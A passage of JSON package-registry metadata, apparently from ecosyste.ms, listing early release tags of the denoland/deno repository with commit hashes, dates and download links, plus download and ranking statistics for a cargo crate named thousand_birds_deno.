sitories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-22T20:50:24.842Z","dependent_packages_count":0,"downloads":2223,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":96.24247153202799,"dependent_repos_count":25.13167199044159,"dependent_packages_count":33.328253395430494,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":51.567465639300025},"purl":"pkg:cargo/thousand_birds_deno","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/thousand_birds_deno","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.m